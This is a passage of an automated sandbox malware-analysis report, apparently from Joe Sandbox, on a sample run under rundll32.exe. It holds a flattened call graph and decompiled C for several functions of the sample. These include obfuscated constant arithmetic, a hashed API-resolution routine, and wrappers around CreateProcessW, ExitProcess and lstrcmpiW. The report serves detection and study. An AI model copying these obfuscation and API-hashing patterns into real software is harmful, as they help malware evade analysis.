4773->4774 4774->4042 4776 30e7d5d 4775->4776 4777 30d2309 GetPEB 4776->4777 4778 30e7dfa 4777->4778 4778->4176 4780 30d9a76 4779->4780 4781 30d9d6d 4780->4781 4782 30d9d6f 4780->4782 4783 30df38a GetPEB 4780->4783 4790 30f0f49 4780->4790 4781->4176 4784 30f0f49 GetPEB 4782->4784 4783->4780 4784->4781 4787 30e3c40 4786->4787 4788 30d2309 GetPEB 4787->4788 4789 30e3cd2 4788->4789 4789->4176 4791 30f0f76 4790->4791 4792 30d2309 GetPEB 4791->4792 4793 30f100e 4792->4793 4793->4780 4795 30eaf05 4794->4795 4796 30d3f5c GetPEB 4795->4796 4797 30eb095 4796->4797 4804 30d2411 4797->4804 4800 30f0352 GetPEB 4801 30eb0c5 4800->4801 4808 30ef790 4801->4808 4805 30d2430 4804->4805 4806 30f2e95 GetPEB 4805->4806 4807 30d2449 4806->4807 4807->4800 4809 30ef7a6 4808->4809 4810 30d2309 GetPEB 4809->4810 4811 30eb0dd 4810->4811 4811->4192 4813 30e3fc7 4812->4813 4814 30d2309 GetPEB 4813->4814 4815 30e4063 4814->4815 4815->4210 4818 30dc624 4816->4818 4820 30dcc75 4818->4820 4822 30dcc73 4818->4822 4823 30d3f5c GetPEB 4818->4823 4824 30d2411 GetPEB 4818->4824 4825 30dab99 GetPEB 4818->4825 4826 30dc5fe GetPEB 4818->4826 4827 30f0352 GetPEB 4818->4827 4828 30ee9e8 4818->4828 4832 30e1a80 4818->4832 4836 30dfbfa 4820->4836 4822->4206 4823->4818 4824->4818 4825->4818 4826->4818 4827->4818 4829 30eea04 4828->4829 4830 30d2309 GetPEB 4829->4830 4831 30eea9e 4830->4831 4831->4818 4833 30e1a9d 4832->4833 4834 30d2309 GetPEB 4833->4834 4835 30e1b45 4834->4835 4835->4818 4837 30dfc0d 4836->4837 4838 30d2309 GetPEB 4837->4838 4839 30dfcbd 4838->4839 4839->4822 4843 30d3739 4840->4843 4841 30d377a 4841->4215 4843->4841 4844 30e38ca GetPEB 4843->4844 4845 30d376a 4843->4845 4944 30e98bd 4843->4944 4952 30f0687 4843->4952 4844->4843 4940 30ddfd3 4845->4940 4860 30f2220 4848->4860 4849 30ea566 GetPEB 4849->4860 4851 30f24b4 4852 30ecaa8 2 API calls 4851->4852 4853 30f24e1 4852->4853 4856 30ea566 GetPEB 4853->4856 4864 30f24b2 4853->4864 4854 30ed617 GetPEB 4854->4860 4859 30f24ff 4856->4859 4858 30e3fae GetPEB 4858->4860 4861 30ea566 GetPEB 4859->4861 4860->4849 4860->4851 4860->4854 4860->4858 4862 30d4af2 GetPEB 4860->4862 4860->4864 4865 30d3f5c GetPEB 4860->4865 4866 30dab99 GetPEB 4860->4866 4867 30f0352 GetPEB 4860->4867 4969 30ee867 4860->4969 4972 30f01ed 4860->4972 4976 30f25c3 4860->4976 4983 30da048 4860->4983 4991 30ddaae 4860->4991 4861->4864 4862->4860 4864->4215 4865->4860 4866->4860 4867->4860 4877 30dc4c4 4869->4877 4870 30ecaa8 2 API calls 4870->4877 4871 30ed617 GetPEB 4871->4877 4872 30dc5f4 4872->4215 4873 30e3fae GetPEB 4873->4877 4874 30f01ed GetPEB 4874->4877 4875 30d3f5c GetPEB 4875->4877 4876 30dab99 GetPEB 4876->4877 4877->4870 4877->4871 4877->4872 4877->4873 4877->4874 4877->4875 4877->4876 4878 30f0352 GetPEB 4877->4878 4879 30f25c3 GetPEB 4877->4879 4878->4877 4879->4877 4884 30d3490 4880->4884 4881 30d34f6 4881->4215 4882 30f18d2 GetPEB 4882->4884 4883 30d2043 GetPEB 4883->4884 4884->4881 4884->4882 4884->4883 4885 30ddfd3 GetPEB 4884->4885 4886 30ea566 GetPEB 4884->4886 4885->4884 4886->4884 4888 30d919a 4887->4888 4889 30d3035 GetPEB 4888->4889 4890 30d3f5c GetPEB 4888->4890 4891 30d9379 4888->4891 4892 30ed617 GetPEB 4888->4892 4893 30e3fae GetPEB 4888->4893 4894 30f01ed GetPEB 4888->4894 4895 30ecaa8 2 API calls 4888->4895 4896 30dab99 GetPEB 4888->4896 4897 30f0352 GetPEB 4888->4897 4898 30f25c3 GetPEB 4888->4898 4889->4888 4890->4888 4891->4215 4892->4888 4893->4888 4894->4888 4895->4888 4896->4888 4897->4888 4898->4888 4902 30e1e5f 4899->4902 4900 30e98bd GetPEB 4900->4902 4901 30e1ea0 4901->4215 4902->4900 4902->4901 4903 30e1e90 4902->4903 4904 30e38ca GetPEB 4902->4904 4906 30f0687 GetPEB 4902->4906 4905 30ddfd3 GetPEB 4903->4905 4904->4902 4905->4901 4906->4902 4916 30eb931 4907->4916 4908 30d3035 GetPEB 4908->4916 4909 30ebb0d 4909->4215 4910 30ed617 GetPEB 4910->4916 4911 30e3fae GetPEB 4911->4916 4912 30f01ed GetPEB 4912->4916 4913 30ecaa8 2 API calls 4913->4916 4914 30d3f5c GetPEB 4914->4916 4915 30dab99 GetPEB 4915->4916 4916->4908 4916->4909 4916->4910 4916->4911 4916->4912 4916->4913 4916->4914 4916->4915 4917 30f0352 GetPEB 4916->4917 4918 30f25c3 GetPEB 4916->4918 4917->4916 4918->4916 5025 30f10f0 4919->5025 4921 30d3035 GetPEB 4930 30e2a46 4921->4930 4923 30ed617 GetPEB 4923->4930 4924 30d2654 GetPEB 4924->4930 4925 30d2043 GetPEB 4925->4930 4926 30e2e15 4926->4215 4927 30ef6d3 GetPEB 4927->4930 4928 30e2e17 4931 30ea566 GetPEB 4928->4931 4929 30e3fae GetPEB 4929->4930 4930->4921 4930->4923 4930->4924 4930->4925 4930->4926 4930->4927 4930->4928 4930->4929 4932 30e0387 GetPEB 4930->4932 4934 30ecaa8 2 API calls 4930->4934 4935 30f01ed GetPEB 4930->4935 4936 30d3f5c GetPEB 4930->4936 4937 30dab99 GetPEB 4930->4937 4938 30f0352 GetPEB 4930->4938 4939 30f25c3 GetPEB 4930->4939 5028 30dea72 4930->5028 5032 30d7283 4930->5032 4931->4926 4932->4930 4934->4930 4935->4930 4936->4930 4937->4930 4938->4930 4939->4930 4941 30ddfe3 4940->4941 4957 30dfcc9 4941->4957 4945 30e98d4 4944->4945 4946 30e9b60 4945->4946 4961 30d68df 4945->4961 4946->4843 4949 30d1ed4 GetPEB 4950 30e9b17 4949->4950 4950->4946 4951 30d1ed4 GetPEB 4950->4951 4951->4950 4955 30f069b 4952->4955 4953 30f07ed 4953->4843 4954 30e9d10 GetPEB 4954->4955 4955->4953 4955->4954 4965 30e7e0b 4955->4965 4958 30dfce8 4957->4958 4959 30d2309 GetPEB 4958->4959 4960 30de09b 4959->4960 4960->4841 4962 30d68fd 4961->4962 4963 30d2309 GetPEB 4962->4963 4964 30d6990 4963->4964 4964->4946 4964->4949 4966 30e7e2a 4965->4966 4967 30d2309 GetPEB 4966->4967 4968 30e7ec4 4967->4968 4968->4955 4970 30d2309 GetPEB 4969->4970 4971 30ee905 4970->4971 4971->4860 4973 30f0204 4972->4973 4974 30d419a GetPEB 4973->4974 4975 30f029e 4974->4975 4975->4860 4982 30f25dd 4976->4982 4978 30f2850 4979 30ea566 GetPEB 4978->4979 4981 30f284e 4979->4981 4980 30e199d GetPEB 4980->4982 4981->4860 4982->4978 4982->4980 4982->4981 5001 30ed551 4982->5001 4985 30da06d 4983->4985 4984 30ee867 GetPEB 4984->4985 4985->4984 4987 30da2da 4985->4987 4989 30da2d8 4985->4989 5005 30f0104 4985->5005 5009 30efc5c 4985->5009 4990 30ea566 GetPEB 4987->4990 4989->4860 4990->4989 4999 30ddaed 4991->4999 4992 30d5a31 GetPEB 4992->4999 4994 30dde94 5013 30ecfb7 4994->5013 4995 30d3f5c GetPEB 4995->4999 4997 30ddeb0 4997->4860 4999->4992 4999->4994 4999->4995 4999->4997 5000 30f0352 GetPEB 4999->5000 5017 30eff53 4999->5017 5021 30d2f36 4999->5021 5000->4999 5002 30ed578 5001->5002 5003 30d2309 GetPEB 5002->5003 5004 30ed601 5003->5004 5004->4982 5006 30f012a 5005->5006 5007 30d2309 GetPEB 5006->5007 5008 30f01d3 5007->5008 5008->4985 5010 30efc78 5009->5010 5011 30d2309 GetPEB 5010->5011 5012 30efd02 5011->5012 5012->4985 5014 30ecfcd 5013->5014 5015 30d2309 GetPEB 5014->5015 5016 30ed085 5015->5016 5016->4997 5018 30eff70 5017->5018 5019 30d2309 GetPEB 5018->5019 5020 30f001b 5019->5020 5020->4999 5022 30d2f75 5021->5022 5023 30d2309 GetPEB 5022->5023 5024 30d3012 5023->5024 5024->4999 5026 30d2309 GetPEB 5025->5026 5027 30f118a 5026->5027 5027->4930 5029 30deaa3 5028->5029 5030 30d2309 GetPEB 5029->5030 5031 30deb25 5030->5031 5031->4930 5033 30d72a9 5032->5033 5034 30df38a GetPEB 5033->5034 5035 30d755d 5033->5035 5036 30d755f 5033->5036 5034->5033 5035->4930 5037 30ebb18 GetPEB 5036->5037 5037->5035 5039 30ecd19 5038->5039 5040 30d2309 GetPEB 5039->5040 5041 30ecdda 5040->5041 5041->4237 5043 30e90e0 5042->5043 5046 30d2043 GetPEB 5043->5046 5047 30f343c GetPEB 5043->5047 5048 30df38a GetPEB 5043->5048 5049 30e9891 5043->5049 5050 30e98a4 5043->5050 5051 30ea1d9 GetPEB 5043->5051 5054 30d419a GetPEB 5043->5054 5055 30e9c25 5043->5055 5059 30d887a 5043->5059 5063 30ede17 5043->5063 5046->5043 5047->5043 5048->5043 5052 30d2043 GetPEB 5049->5052 5050->4237 5051->5043 5052->5050 5054->5043 5056 30e9c5f 5055->5056 5057 30d2309 GetPEB 5056->5057 5058 30e9cf1 5057->5058 5058->5043 5060 30d8896 5059->5060 5061 30d2309 GetPEB 5060->5061 5062 30d8923 5061->5062 5062->5043 5064 30ede42 5063->5064 5065 30d2309 GetPEB 5064->5065 5066 30ededd 5065->5066 5066->5043 5068 30ed48c 5067->5068 5069 30d2309 GetPEB 5068->5069 5070 30ed53e 5069->5070 5070->4248 5072 30dbfd7 5071->5072 5082 30e03d1 5072->5082 5075 30dc14c 5075->4265 5078 30ea566 GetPEB 5078->5075 5089 30d30f6 5079->5089 5083 30d2309 GetPEB 5082->5083 5084 30dc120 5083->5084 5084->5075 5085 30dbede 5084->5085 5086 30dbef9 5085->5086 5087 30d2309 GetPEB 5086->5087 5088 30dbfa2 5087->5088 5088->5078 5096 30d3123 5089->5096 5092 30d332b 5093 30ea566 GetPEB 5092->5093 5094 30d3329 5093->5094 5094->4265 5096->5092 5096->5094 5098 30d9db5 5096->5098 5101 30ef606 5096->5101 5105 30ea4a0 5096->5105 5109 30e1b54 5096->5109 5099 30d8934 GetPEB 5098->5099 5100 30d9e07 5099->5100 5100->5096 5102 30ef61c 5101->5102 5103 30d2309 GetPEB 5102->5103 5104 30ef6c5 5103->5104 5104->5096 5106 30ea4b7 5105->5106 5107 30d2309 GetPEB 5106->5107 5108 30ea557 5107->5108 5108->5096 5110 30d2309 GetPEB 5109->5110 5111 30e1c02 5110->5111 5111->5096 5113 30e523f 5112->5113 5115 30e548e 5113->5115 5118 30e548c 5113->5118 5124 30dbe19 5113->5124 5116 30d5923 GetPEB 5115->5116 5117 30e54a8 5116->5117 5128 30e4baa 5117->5128 5118->4268 5123 30f0352 GetPEB 5123->5118 5125 30dbe2f 5124->5125 5126 30d2309 GetPEB 5125->5126 5127 30dbed0 5126->5127 5127->5113 5137 30de16f 5128->5137 5132 30e4d82 5133 30e7a91 5132->5133 5134 30e7ab3 5133->5134 5135 30f2e95 GetPEB 5134->5135 5136 30e54dd 5135->5136 5136->5123 5138 30de18c 5137->5138 5139 30d2309 GetPEB 5138->5139 5140 30de20e 5139->5140 5140->5132 5141 30ea809 5140->5141 5142 30ea837 5141->5142 5143 30d2309 GetPEB 5142->5143 5144 30ea8db 5143->5144 5144->5132 5146 30e73dc 5145->5146 5147 30d2309 GetPEB 5146->5147 5148 30d4bd3 5147->5148 5148->4042 5150 30ee927 5149->5150 5151 30d2309 GetPEB 5150->5151 5152 30ee9da 5151->5152 5152->4294 5154 30d69c6 5153->5154 5155 30d2309 GetPEB 5154->5155 5156 30d6a62 5155->5156 5156->4294 5162 30d52ae 5157->5162 5158 30d3f5c GetPEB 5158->5162 5160 30eceb9 GetPEB 5160->5162 5161 30d53d4 5163 30e3d6e GetPEB 5161->5163 5162->5158 5162->5160 5162->5161 5164 30d53d2 5162->5164 5165 30f0352 GetPEB 5162->5165 5170 30e0490 5162->5170 5163->5164 5164->4294 5165->5162 5167 30eeb5c 5166->5167 5168 30d2309 GetPEB 5167->5168 5169 30eec0d 5168->5169 5169->4283 5171 30e04a9 5170->5171 5172 30d2309 GetPEB 5171->5172 5173 30e055b 5172->5173 5173->5162 5178 30d3c91 5179 30e3fae GetPEB 5178->5179 5180 30d3ed7 5179->5180 5181 30e17cb 2 API calls 5180->5181 5182 30d3eeb 5181->5182 5183 30d3f5c GetPEB 5182->5183 5190 30d3f4e 5182->5190 5184 30d3f06 5183->5184 5185 30dab99 GetPEB 5184->5185 5186 30d3f27 5185->5186 5187 30f0352 GetPEB 5186->5187 5188 30d3f36 5187->5188 5189 30ef790 GetPEB 5188->5189 5189->5190 3915 30e43b3 3916 30e4473 3915->3916 3917 30e449e 3915->3917 3921 30d441e 3916->3921 3926 30d48e6 3921->3926 3923 30d4ac5 3945 30ecaa8 3923->3945 3926->3923 3927 30d4ac3 3926->3927 3931 30d3f5c GetPEB 3926->3931 3932 30f0352 GetPEB 3926->3932 3937 30e17cb 3926->3937 3941 30d3035 3926->3941 3955 30ed617 3926->3955 3959 30dab99 3926->3959 3963 30f1988 3926->3963 3966 30d5a31 3926->3966 3927->3917 3934 30d4248 3927->3934 3931->3926 3932->3926 3935 30d2309 GetPEB 3934->3935 3936 30d42ec ExitProcess 3935->3936 3936->3917 3938 30e17e1 3937->3938 3970 30d2309 3938->3970 3942 30d3054 3941->3942 3943 30d2309 GetPEB 3942->3943 3944 30d30e3 3943->3944 3944->3926 3946 30ecacf 3945->3946 3947 30d5a31 GetPEB 3946->3947 3948 30ecc5c 3947->3948 4000 30f31d2 3948->4000 3950 30ecc95 3951 30ecca0 3950->3951 4004 30ea566 3950->4004 3951->3927 3954 30ea566 GetPEB 3954->3951 3956 30ed631 3955->3956 4008 30f07fc 3956->4008 3960 30dabbd 3959->3960 4012 30f2e95 3960->4012 3964 30d2309 GetPEB 3963->3964 3965 30f1a33 3964->3965 3965->3926 3967 30d5a4b 3966->3967 4015 30e7c86 3967->4015 3971 30d23fb lstrcmpiW 3970->3971 3972 30d23d4 3970->3972 3971->3926 3976 30ebec9 3972->3976 3974 30d23e6 3979 30ea607 3974->3979 3983 30ede10 GetPEB 3976->3983 3978 30ebfaa 3978->3974 3981 30ea62c 3979->3981 3980 30ea6e6 3980->3971 3981->3980 3984 30eb1b5 3981->3984 3983->3978 3985 30eb31e 3984->3985 3992 30de902 3985->3992 3988 30eb360 3990 30ea607 GetPEB 3988->3990 3991 30eb38e 3988->3991 3990->3991 3991->3980 3993 30de915 3992->3993 3994 30d2309 GetPEB 3993->3994 3995 30de9bb 3994->3995 3995->3988 3996 30e9d10 3995->3996 3997 30e9d20 3996->3997 3998 30d2309 GetPEB 3997->3998 3999 30e9d95 3998->3999 3999->3988 4001 30f3205 4000->4001 4002 30d2309 GetPEB 4001->4002 4003 30f32a6 CreateProcessW 4002->4003 4003->3950 4005 30ea576 4004->4005 4006 30d2309 GetPEB 4005->4006 4007 30ea5fb 4006->4007 4007->3954 4009 30f0824 4008->4009 4010 30d2309 GetPEB 4009->4010 4011 30ed69c 4010->4011 4011->3926 4013 30d2309 GetPEB 4012->4013 4014 30dabd7 4013->4014 4014->3926 4016 30e7ca1 4015->4016 4019 30f2f5c 4016->4019 4020 30f2f7b 4019->4020 4021 30d2309 GetPEB 4020->4021 4022 30d5aa9 4021->4022 4022->3926 5191 30efd10 5192 30efe4b 5191->5192 5193 30efe91 5192->5193 5194 30d5923 GetPEB 5192->5194 5195 30efe65 5194->5195 5199 30ebd84 5195->5199 5198 30f0352 GetPEB 5198->5193 5200 30ebd9f 5199->5200 5202 30ebe97 5200->5202 5203 30f2869 5200->5203 5202->5198 5204 30f2882 5203->5204 5205 30d2309 GetPEB 5204->5205 5206 30f291c 5205->5206 5206->5200

                                                                                                        Executed Functions

                                                                                                        Function 030F31D2, Relevance: 1.6, APIs: 1, Instructions: 77processCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 63 30f31d2-30f32c2 call 30f2523 call 30d2309 CreateProcessW
                                                                                                        C-Code - Quality: 53%
                                                                                                        			E030F31D2(void* __ecx, WCHAR* __edx, intOrPtr _a8, intOrPtr _a12, WCHAR* _a16, struct _STARTUPINFOW* _a28, intOrPtr _a32, intOrPtr _a36, struct _PROCESS_INFORMATION* _a48, int _a52, intOrPtr _a56) {
				signed int _v8;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				struct _SECURITY_ATTRIBUTES* _v24;
				intOrPtr _v28;
				void* _t54;
				int _t63;
				signed int _t65;
				WCHAR* _t71;

				_push(_a56);
				_t71 = __edx;
				_push(_a52);
				_push(_a48);
				_push(0);
				_push(0);
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(0);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(0);
				_push(__edx);
				E030F2523(_t54);
				_v28 = 0x2cec17;
				_v24 = 0;
				_v16 = 0x5aadab;
				_v16 = _v16 << 3;
				_v16 = _v16 >> 0xc;
				_v16 = _v16 ^ 0x000031a8;
				_v12 = 0x82119f;
				_v12 = _v12 >> 2;
				_v12 = _v12 + 0xffff09c3;
				_t65 = 0x25;
				_v12 = _v12 / _t65;
				_v12 = _v12 ^ 0x0004d7f2;
				_v8 = 0x7cd8a6;
				_v8 = _v8 >> 6;
				_v8 = _v8 | 0x702a8e48;
				_v8 = _v8 + 0xffff37f0;
				_v8 = _v8 ^ 0x702d019b;
				_v20 = 0x367fb2;
				_v20 = _v20 + 0xffff7ba2;
				_v20 = _v20 ^ 0x003ae9c9;
				E030D2309(0x2e4, _t65, _t65, 0xbf8568a3, _t65, 0x9c9047d0);
				_t63 = CreateProcessW(_t71, _a16, 0, 0, _a52, 0, 0, 0, _a28, _a48); // executed
				return _t63;
			}













                                                                                                        0x030f31da
                                                                                                        0x030f31df
                                                                                                        0x030f31e1
                                                                                                        0x030f31e4
                                                                                                        0x030f31e7
                                                                                                        0x030f31e8
                                                                                                        0x030f31e9
                                                                                                        0x030f31ec
                                                                                                        0x030f31ef
                                                                                                        0x030f31f2
                                                                                                        0x030f31f3
                                                                                                        0x030f31f4
                                                                                                        0x030f31f7
                                                                                                        0x030f31fa
                                                                                                        0x030f31fd
                                                                                                        0x030f31fe
                                                                                                        0x030f3200
                                                                                                        0x030f3205
                                                                                                        0x030f320f
                                                                                                        0x030f3214
                                                                                                        0x030f321b
                                                                                                        0x030f321f
                                                                                                        0x030f3223
                                                                                                        0x030f322a
                                                                                                        0x030f3231
                                                                                                        0x030f3235
                                                                                                        0x030f3241
                                                                                                        0x030f3249
                                                                                                        0x030f324c
                                                                                                        0x030f3253
                                                                                                        0x030f325a
                                                                                                        0x030f325e
                                                                                                        0x030f3265
                                                                                                        0x030f326c
                                                                                                        0x030f3273
                                                                                                        0x030f327a
                                                                                                        0x030f3281
                                                                                                        0x030f32a1
                                                                                                        0x030f32bb
                                                                                                        0x030f32c2

                                                                                                        APIs
                                                                                                        • CreateProcessW.KERNELBASE(000C0354,?,00000000,00000000,?,00000000,00000000,00000000,229292B4,?), ref: 030F32BB
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.710421091.00000000030D1000.00000020.00000001.sdmp, Offset: 030D0000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.710416535.00000000030D0000.00000004.00000001.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.710455705.00000000030F5000.00000004.00000001.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.710460115.00000000030F7000.00000002.00000001.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_30d0000_rundll32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CreateProcess
                                                                                                        • String ID:
                                                                                                        • API String ID: 963392458-0
                                                                                                        • Opcode ID: 1c884f6c38555fd1f2acfe04ef4172838376d53041689723563821acbd5a938d
                                                                                                        • Instruction ID: 9ad26d36205ff988089de5e8b2818ea934cb45120a6e2252eed9666faf645644
                                                                                                        • Opcode Fuzzy Hash: 1c884f6c38555fd1f2acfe04ef4172838376d53041689723563821acbd5a938d
                                                                                                        • Instruction Fuzzy Hash: 9D311676801248BBCF65DF96CD09CDFBFB9FB89704F108188F91466220D3B58A60DBA0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 030D4248, Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 68 30d4248-30d42f6 call 30d2309 ExitProcess
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E030D4248() {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _t52;
				signed int _t53;

				_v24 = _v24 & 0x00000000;
				_v32 = 0xac8d12;
				_v28 = 0x59a528;
				_v12 = 0xae5295;
				_v12 = _v12 << 2;
				_t52 = 0xb;
				_v12 = _v12 / _t52;
				_v12 = _v12 ^ 0x0038a8c1;
				_v20 = 0xfd2184;
				_v20 = _v20 ^ 0xb7361747;
				_v20 = _v20 ^ 0xb7cc531f;
				_v8 = 0xac9b8;
				_t53 = 9;
				_v8 = _v8 / _t53;
				_v8 = _v8 << 0xd;
				_v8 = _v8 >> 0xd;
				_v8 = _v8 ^ 0x00077309;
				_v16 = 0x4164cf;
				_v16 = _v16 << 2;
				_v16 = _v16 ^ 0x010bebe7;
				E030D2309(0x37f, _t53, _t53, 0x8b1a77d6, _t53, 0x9c9047d0);
				ExitProcess(0);
			}












                                                                                                        0x030d424e
                                                                                                        0x030d4254
                                                                                                        0x030d425b
                                                                                                        0x030d4262
                                                                                                        0x030d4269
                                                                                                        0x030d4272
                                                                                                        0x030d4277
                                                                                                        0x030d427c
                                                                                                        0x030d4283
                                                                                                        0x030d428a
                                                                                                        0x030d4291
                                                                                                        0x030d4298
                                                                                                        0x030d42a2
                                                                                                        0x030d42aa
                                                                                                        0x030d42ad
                                                                                                        0x030d42b1
                                                                                                        0x030d42b5
                                                                                                        0x030d42bc
                                                                                                        0x030d42c3
                                                                                                        0x030d42c7
                                                                                                        0x030d42e7
                                                                                                        0x030d42f1

                                                                                                        APIs
                                                                                                        • ExitProcess.KERNEL32(00000000), ref: 030D42F1
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.710421091.00000000030D1000.00000020.00000001.sdmp, Offset: 030D0000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.710416535.00000000030D0000.00000004.00000001.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.710455705.00000000030F5000.00000004.00000001.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.710460115.00000000030F7000.00000002.00000001.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_30d0000_rundll32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ExitProcess
                                                                                                        • String ID:
                                                                                                        • API String ID: 621844428-0
                                                                                                        • Opcode ID: 11cce549a584f233032fc040f1d8beaa3eb6087a0dfae4806d5bd7ccc63cf562
                                                                                                        • Instruction ID: e09f38618d4ec9f13407c809335d65ed4d468883bbdc2e28ff73d96de5e2d424
                                                                                                        • Opcode Fuzzy Hash: 11cce549a584f233032fc040f1d8beaa3eb6087a0dfae4806d5bd7ccc63cf562
                                                                                                        • Instruction Fuzzy Hash: 4A1128B5E00208EBDB44DFE5D94AADEBBF1FB44308F208089E515A7240D7B45B18CFA1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 030E17CB, Relevance: 1.3, APIs: 1, Instructions: 56stringCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 71 30e17cb-30e1893 call 30f2523 call 30d2309 lstrcmpiW
                                                                                                        C-Code - Quality: 86%
                                                                                                        			E030E17CB(WCHAR* __ecx, void* __edx, intOrPtr _a4, WCHAR* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _t44;
				int _t55;
				signed int _t57;
				WCHAR* _t62;

				_push(_a8);
				_t62 = __ecx;
				_push(_a4);
				_push(__ecx);
				E030F2523(_t44);
				_v24 = _v24 & 0x00000000;
				_v32 = 0x2c5dd9;
				_v28 = 0x29a411;
				_v16 = 0xb6013c;
				_v16 = _v16 >> 2;
				_v16 = _v16 << 5;
				_v16 = _v16 ^ 0x05bceb0d;
				_v12 = 0xa7496a;
				_t57 = 7;
				_v12 = _v12 * 0x55;
				_v12 = _v12 | 0x1a205192;
				_v12 = _v12 ^ 0x3fab9f8f;
				_v8 = 0xf5055a;
				_v8 = _v8 / _t57;
				_v8 = _v8 + 0xa16;
				_v8 = _v8 * 0x7e;
				_v8 = _v8 ^ 0x1132ba81;
				_v20 = 0xaea409;
				_v20 = _v20 << 6;
				_v20 = _v20 ^ 0x2ba3ef66;
				E030D2309(0xb8, _t57, _t57, 0xbf157248, _t57, 0x9c9047d0);
				_t55 = lstrcmpiW(_t62, _a8); // executed
				return _t55;
			}














                                                                                                        0x030e17d2
                                                                                                        0x030e17d5
                                                                                                        0x030e17d7
                                                                                                        0x030e17db
                                                                                                        0x030e17dc
                                                                                                        0x030e17e1
                                                                                                        0x030e17e8
                                                                                                        0x030e17f1
                                                                                                        0x030e17f8
                                                                                                        0x030e17ff
                                                                                                        0x030e1803
                                                                                                        0x030e1807
                                                                                                        0x030e180e
                                                                                                        0x030e181b
                                                                                                        0x030e1822
                                                                                                        0x030e1825
                                                                                                        0x030e182c
                                                                                                        0x030e1833
                                                                                                        0x030e1844
                                                                                                        0x030e1847
                                                                                                        0x030e1859
                                                                                                        0x030e185c
                                                                                                        0x030e1863
                                                                                                        0x030e186a
                                                                                                        0x030e186e
                                                                                                        0x030e1881
                                                                                                        0x030e188d
                                                                                                        0x030e1893

                                                                                                        APIs
                                                                                                        • lstrcmpiW.KERNELBASE(?,05BCEB0D,?,?,?,?,?,?,?,?,00000000), ref: 030E188D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.710421091.00000000030D1000.00000020.00000001.sdmp, Offset: 030D0000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.710416535.00000000030D0000.00000004.00000001.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.710455705.00000000030F5000.00000004.00000001.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.710460115.00000000030F7000.00000002.00000001.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_30d0000_rundll32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: lstrcmpi
                                                                                                        • String ID:
                                                                                                        • API String ID: 1586166983-0
                                                                                                        • Opcode ID: d112a349bd06866e322501f938da4f729aeb5c72f8ac7eafb21e1b49d57e3827
                                                                                                        • Instruction ID: 0add233f5c4e04601ebbf229e043b490ac87ec221c3f4bebe1173735269c68f7
                                                                                                        • Opcode Fuzzy Hash: d112a349bd06866e322501f938da4f729aeb5c72f8ac7eafb21e1b49d57e3827
                                                                                                        • Instruction Fuzzy Hash: BA2124B5D0120CFFDB08DFA4C94A9EEBBB4EB44304F208189E425B7240E3B56B049FA1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Non-executed Functions

                                                                                                        Function 030EDE10, Relevance: .0, Instructions: 2COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E030EDE10() {

				return  *[fs:0x30];
			}



                                                                                                        0x030ede16

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.710421091.00000000030D1000.00000020.00000001.sdmp, Offset: 030D0000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.710416535.00000000030D0000.00000004.00000001.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.710455705.00000000030F5000.00000004.00000001.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.710460115.00000000030F7000.00000002.00000001.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_30d0000_rundll32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                                                        • Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
                                                                                                        • Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                                                        • Instruction Fuzzy Hash:
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Analysis Process: rundll32.exe PID: 4928 Parent PID: 6792 rundll32.exeCOMMON

                                                                                                        Execution Graph

